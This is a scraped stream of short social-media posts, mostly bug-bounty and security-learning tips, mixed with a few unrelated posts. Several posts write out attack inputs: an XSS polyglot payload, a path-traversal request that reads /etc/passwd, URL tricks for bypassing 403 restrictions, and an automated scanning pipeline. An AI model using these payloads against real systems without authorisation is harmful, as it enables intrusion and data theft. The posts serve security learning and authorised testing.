#help post I want to learn #JavaScript for hacking purposes. Can you suggest some resources for this purpose?
Posting this so I don't forget a great XSS polyglot javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> Anyone got any more interesting polyglots?
Bug Testing Methodology Series: XSS (Cross Site Scripting) Learn how to test for #XSS step by step on real #bugbounty programs. Thread🧵👇 #cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity
Authentication Bypass - I have just completed this room! Check it out: tryhackme.com/room/authentic… #tryhackme #security #authenticationbypass via @realtryhackme
Careers in Cyber - I have just completed this room! Check it out: tryhackme.com/room/careersin… #tryhackme #security #career #job #security analyst #security engineer #incident responder #digital forensics examiner #malware analyst #penetration tester #red teamer #careersincyber
Intro to Defensive Security - I have just completed this room! Check it out: tryhackme.com/room/defensive… #tryhackme #security #defensive security #incident response #threat intelligence #malware analysis #DFIR #SOC #SIEM #Security Operations Center #defensivesecurity
Intro to Offensive Security - I have just completed this room! Check it out: tryhackme.com/room/introtoof… #tryhackme #offensive security #introtooffensivesecurity via @realtryhackme
#LFI #P1 #bugbountytips #bugbounty 1- Go to admin. site.tld/login 2- Tried to login with wrong credentials > error 3- Send to burp repeater 4- Found new parameter filename because of error 5- tried payload ../../../../../../../../../../../../etc/passwd 6- Full LFI ✅
Speak softly and humbly, Do not look down upon others, Be kind, gentle and non-judgemental Learn the adab (manners) of our Prophet (peace be upon him).
Nice one! Let's automate it 🔥🔥 cat targets.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc | nuclei -t severity high -silent | tee -a BugsFound.txt twitter.com/Fozisimi143/st… #bugbountytips #bugbountytip #bugbounty
Easy to find PUT method enabled misconfiguration through @pdnuclei 1) Subdomain enumeration 2) http probing through httpx 3) save file into the hosts.txt file 4) run nuclei on hosts.txt file 5) nuclei -l hosts.txt -severity high 6) got a response put-method-enabled
🔎 What is your favourite reconnaissance tool? 🔍
I need a new chair - what do people recommend these days? I have a @secretlabchairs, but in two years its covering has frayed, and the arms have broken.. looking for other options
Bug Type: Reflected XSS Reward : 200$ 1) Pipe domain with waybackurls 2) Grep .php extension URLs and save in a file 3) Use arjun to find hidden parameters 4) Manually test each URL with XSS payloads #bugbountytip #bugbounty #cybersecurity #cybersecuritytips #Pentesting
Vroooo @ADITYASHENDE17 finally bypassed the Akamai WAF and exploited the Boolean based SQL😜😜.. Thanks for the tampering suggestion 😂🙊
403 Forbidden bypass 🔥🔥 GET /admin ==> 403 Forbidden GET /blablabal/%2e%2e/admin ==> 200 OK GET /blablabal/..;/admin ==> 200 OK GET /blablabal/;/admin ==> 200 OK GET /blablabal/admin/..;/ ==> 200 OK GET /admin?access=1 ==> 200 OK #bugbountytips #bugbountytip #bugbounty
Some cool bypassing endpoints: #bugbountytips #infosec #appsec #Pentesting
Some cool endpoint bypasses simplified: #bugbountytips #infosec #appsec #pentest
Some blind xss techniques simplified: #bugbountytips #infosec #appsec #Pentesting
📂 Web 3.0 Smart Contracts Security ∟📂 Top Vulnerabilities ∟📂 Reentrancy ∟📂 Uninitialized Storage Pointer ∟📂 Assert Violation ∟📂 DoS with Failed Call ∟📂 Signature Malleability ∟📂 Integer Overflow and Underflow
See a host that's redirecting to Single-Sign on? Don't skip it. Do Content-Discovery. Use gau. Then ffuf. You will be surprised at the misconfigurations you'll find. And the things you can access (that you shouldn't be able to).